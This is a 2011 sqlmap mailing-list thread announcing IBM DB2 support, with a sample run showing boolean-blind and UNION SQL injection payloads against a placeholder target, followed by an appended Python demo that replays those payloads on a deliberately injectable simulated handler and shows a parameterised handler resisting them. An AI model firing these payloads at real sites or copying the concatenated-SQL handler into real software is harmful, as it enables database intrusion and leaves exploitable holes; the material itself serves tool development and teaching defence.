Re: [sqlmap-users] IBM DB2 support
From: Andres T. A. <ata...@gm...> - 2011-08-10 09:30:01
Hi,

Is the "--dbms=db2" flag still unsupported? I have tried it, however the checked payloads were:

[20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns'

I'm not sure if this is currently a bug or just the expected result :?

Thanks.
Andres

2011/7/6 Bernardo Damele A. G. <ber...@gm...>

> Hi,
>
> Update on IBM DB2 support: payload for time-based has been added[1]
> last week as well as support for direct connection (-d switch).
>
> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>
>
> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote:
> > Hi,
> >
> > The long-awaited IBM DB2 support has been implemented in sqlmap. The
> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
> > and merged in the sqlmap repository after some tweaking by us. It is very
> > stable for both DB2 8.x and 9.x branches.
> > The patch includes support to fingerprint and enumerate data on IBM
> > DB2 via boolean-based blind SQL injection and UNION query SQL
> > injection. Hopefully, soon someone will come up with a payload for
> > time-based and error-based techniques too. Support for direct
> > connection to the DBMS (-d switch) will be implemented soon as well.
> >
> > Thank you Sebastian and the rest of the team at r-tec for your patch
> > and support!
> >
> > Sample run against an IBM DB2 9.7 test environment:
> > --8<--
> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
> >
> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
> > http://sqlmap.sourceforge.net
> >
> > [!] legal disclaimer: usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility
> > to obey all applicable local, state and federal laws. Authors assume
> > no liability and are not responsible for any misuse or damage caused
> > by this program
> >
> > [*] starting at 10:56:21
> >
> > [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
> > [10:56:21] [INFO] testing connection to the target url
> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
> > [10:56:25] [INFO] url is stable
> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
> > [10:56:26] [INFO] GET parameter 'id' is dynamic
> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> > parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
> > GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
> > sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
> > ---
> > Place: GET
> > Parameter: id
> >     Type: boolean-based blind
> >     Title: AND boolean-based blind - WHERE or HAVING clause
> >     Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
> >
> >     Type: UNION query
> >     Title: Generic UNION query (NULL) - 1 to 10 columns
> >     Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
> > ---
> >
> > [10:58:58] [INFO] testing IBM DB2
> > [10:58:59] [INFO] confirming IBM DB2
> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
> > web server operating system: Windows
> > web application technology: PHP 5.3.5, Apache 2.2.17
> > back-end DBMS: active fingerprint: IBM DB2 9.7
> >               html error message fingerprint: DB2
> > [10:59:12] [INFO] fetching banner
> > banner: 'DB2 v9.7.400.501'
> >
> > [10:59:13] [INFO] fetching current user
> > current user: 'TEST'
> > --8<--
> >
> > Bernardo
> >
> >
> > --
> > Bernardo Damele A. G.
> >
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> > PGP Key ID: Unavailable
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
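Added example, not code from this thread or from the sqlmap project: it replays the two DB2 payloads that sqlmap reported in the sample run above (the boolean-based blind payload and the UNION payload built from CHR() concatenation) against a simulated injectable page.php?id= handler, and shows the same payloads failing against a parameterised version of the handler. SQLite stands in for DB2, which is an assumption made for the example: DB2's CHR() is registered as a user-defined function and SYSIBM.SYSDUMMY1 is emulated as a one-row table in an attached schema, so the payloads run verbatim. The "pages" table, its rows and the false-branch payload are constructed for the example.

```python
"""
Replay of the DB2 payloads from the sample run against a simulated target.

Assumptions (not from the original thread): SQLite stands in for DB2, the
"pages" table is constructed, and BOOL_FALSE is a constructed counterpart
of the boolean payload sqlmap reported.
"""
import re
import sqlite3

# Payloads exactly as sqlmap printed them in the sample run (id= prefix stripped).
BOOL_TRUE = "1' AND 7118=7118 AND 'Skhh'='Skhh"
UNION_PAYLOAD = (
    "1' UNION ALL SELECT "
    "CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||"
    "CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||"
    "CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) "
    "FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM"
)
# Constructed counterpart of BOOL_TRUE with a false comparison: a blind
# technique sends both variants and compares the two responses.
BOOL_FALSE = "1' AND 7118=7119 AND 'Skhh'='Skhh"


def decode_chr_chain(expr):
    """Recover the text a DB2 CHR(n)||CHR(n)||... chain evaluates to."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", expr))


def encode_chr_chain(text):
    """Inverse: build the quote-free DB2 string literal used in the UNION payload."""
    return "||".join("CHR(%d)" % ord(ch) for ch in text)


def open_fake_db2():
    """In-memory SQLite database dressed up with the DB2 features the payloads need."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("CHR", 1, chr)  # DB2 CHR(int) -> one-character string
    conn.execute("ATTACH DATABASE ':memory:' AS SYSIBM")
    conn.execute("CREATE TABLE SYSIBM.SYSDUMMY1 (IBMREQD CHAR(1))")
    conn.execute("INSERT INTO SYSIBM.SYSDUMMY1 VALUES ('Y')")
    conn.execute("CREATE TABLE pages (id TEXT, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [("1", "Home"), ("2", "About")])
    return conn


def vulnerable_page(conn, id_value):
    """The injectable handler: the id parameter is concatenated into the SQL text."""
    sql = "SELECT title FROM pages WHERE id = '%s'" % id_value
    return [row[0] for row in conn.execute(sql)]


def safe_page(conn, id_value):
    """Hardened handler: the parameter is bound, so a payload is just an unknown id."""
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (id_value,))
    return [row[0] for row in rows]


def demo():
    """Run every payload through both handlers and collect the results."""
    conn = open_fake_db2()
    return {
        "marker": decode_chr_chain(UNION_PAYLOAD),
        "blind_true": vulnerable_page(conn, BOOL_TRUE),
        "blind_false": vulnerable_page(conn, BOOL_FALSE),
        "union": vulnerable_page(conn, UNION_PAYLOAD),
        "safe_union": safe_page(conn, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-12s %r" % (key, value))
```

The two blind payloads return the "Home" row and an empty result respectively, which is the response difference sqlmap keys on; the UNION payload adds a second row whose value is the CHR() chain decoded to a delimiter-wrapped marker (":nrr:...:eql:"), the string sqlmap searches for in the page to confirm that the injected column is reflected. The bound-parameter handler returns nothing for any of them.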